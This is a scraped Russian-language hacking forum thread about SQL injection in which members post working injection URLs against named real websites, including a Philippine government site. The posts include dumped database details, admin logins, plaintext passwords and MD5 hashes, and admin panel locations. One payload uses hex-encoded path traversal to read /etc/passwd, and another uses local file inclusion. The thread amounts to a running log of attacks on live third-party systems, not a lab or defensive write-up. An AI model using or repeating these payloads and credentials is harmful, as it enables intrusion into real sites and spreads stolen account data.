SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    VERSION: 4.1.22-standard-log
    USER: [email protected]
    DATABASE: 334937_calcms

    ========================================
    VERSION: 5.0.45-COMMUNITY
    USER: NIKITIN_NIKITIN@LOCALHOST
    DATABASE: NIKITIN_EUROFLASH

    ========================================
    VERSION: 4.0.27-icd1-log
    USER: naturally@localhost
    DATABASE: ny_db
     
  2. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    ProTour

    VERSION(): 4.1.11-Debian_4sarge7-log
    DATABASE(): prositer_tour
    USER(): [email protected]
     
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Имена колонок подобрать несмог, мускул 4 ..

    http://www.luthiersargentinos.com.ar/data.php?id=0&p=1&nota=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764,10,11,12,13,14/*
     
  4. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login,user_pass,user_email,user_url,user_status,user_nicename)+using+latin1),3,4,5,6,7,8+from+wp_users+limit+0,1/*
    version()=5.0.15
    login = admin
    pass = saddam
    Кто сможет найти админку, дайте ссылку!!)))
     
  5. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://axe.dp.ua/adm/
    С первого раза:D
     
  6. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    http://www.funnybusiness.ca/news.php?id=-3+UNION+SELECT+1,concat_ws(0x3a,client,password,name),3,4,5,6+from+login_client/*
    http://www.cagayandeoro.gov.ph/index.php?page=news&id=-1+union+select+1,2,concat_ws(0x3a,account_username,account_password),4,5,6,7,8,9+from+tbl_account/*
     
    #5546 banned, 2 Jun 2008
    Last edited: 2 Jun 2008
    1 person likes this.
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    На100ящий, S00pY
    в админку не заходит с твоим пасом. может из другой базы?

    Вот еще базы:
     
    #5547 sabe, 2 Jun 2008
    Last edited: 2 Jun 2008
  8. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    http://www.periodontology.gr
    база
    PS если не сюда запостил удалите плз
     
    #5548 .Striker, 2 Jun 2008
    Last edited: 2 Jun 2008
  9. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    http://old.rusmet.ru/production.php?act=comp&comp_id=-1+union+select+concat_ws(0x3a,database(),user(),version())/*&data_type=1&page=2
    Версия:4.1.22
    Пользователь:rusmet@localhost
    База:rusmet_comp

    http://www.metall.dn.ua/answer.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database()),2/*
    Версия:4.1.22
    Пользователь:metalpor_metalpo@localhos
    База:metalpor_clients
     
    #5549 [aywo], 2 Jun 2008
    Last edited: 2 Jun 2008
  10. XTZ

    XTZ New Member

    Joined:
    29 Sep 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://alesya.by/interview.php?act=intview&int=-24+union+select+1,2,3,4,5/*

    USER(): [email protected]
    DATABASE(): u93086_alesa
    VERSION(): 5.0.45-log
     
  11. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    www.shoesandblues.com

    badlaura:cheney
    becc:brian
    janee:johnny
    zoe:taylor

    админки не нашёл (
     
  12. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    Как поеметь Диму Билана ?(www.bilandima.ru)
    А вот и ответ:
    способ номер раз : анальный =)
    SQL #1
    Требует рeгу.
    http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),database(),user()),23,24,25,26,27,28/*
    Способ номер два: анальный с прибамбасом =)
    SQL#2
    http://www.bilandima.ru/friendsclub/

    Электронная почта
    E-mail

    Пароль
    Password

    подставляем " ' " и емеем

    Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

    Cпособ #3
    Емеем в рот =)

    (Local include)

    http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

    И незабудь резину (Proxy)

    Web-defence.ru
     
    2 people like this.
  13. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    _http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,password+from+_manager/*
    version():5.0.45-log
    pass:a86aea5517a58dd5674aa8dd89337e03
    Ps:Есть также табла "users"
    Pss:_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,login,password+from+passwords+limit+0,1/*
     
    3 people like this.
  14. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    www.semplice.it

    5.0.45:[email protected]:cucina

     
    1 person likes this.
  15. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    telematrixusa.com
    Code:
    http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,version(),user(),database())/*
    5.0.45-community-nt-logtelmtrxusa@localhosttelematrix
    Code:
    http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,username,0x3,password)+from+admin/*
    webadminwebdemo
    http://www.telematrixusa.com/siteadmin
     
    2 people like this.
  16. bakl

    bakl New Member

    Joined:
    29 May 2008
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*


    database: bsigroup_out
    version: 5.0.22
    user: bsigroup_newwww@localhost

    P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)

    Code:
    http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
    P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
     
  17. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Super User:root:89905f508ebdc32e7eb0c24fdb118305

    логин был зашифрован в md5 )
     
    #5557 ~!DoK_tOR!~, 3 Jun 2008
    Last edited: 3 Jun 2008
  18. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    www.bisart.ru --- в антибояне нет

    http://www.bisart.ru/auto/index.php?sid=54+union+select+1,version(),3,4,5,6,7/*

    4.0.27-log
    db11539m
    [email protected]

    ЗЫ. первый найденный мной скуль иньект :) правда с 4ой базой я еще не работал ...
     
  19. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)%23

     
  20. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    фигасе закрутил. :D

    http://www.rakurs.rovno.ua/info.php?id=-4740+union+select+от, одного,до,шести,database(),кагбевосемь,9,version(),user(),12,13,14/*

    database() - rakursr_db
    version() - 5.0.45
    user() - rakursr_user@localhost
     
Thread Status:
Not open for further replies.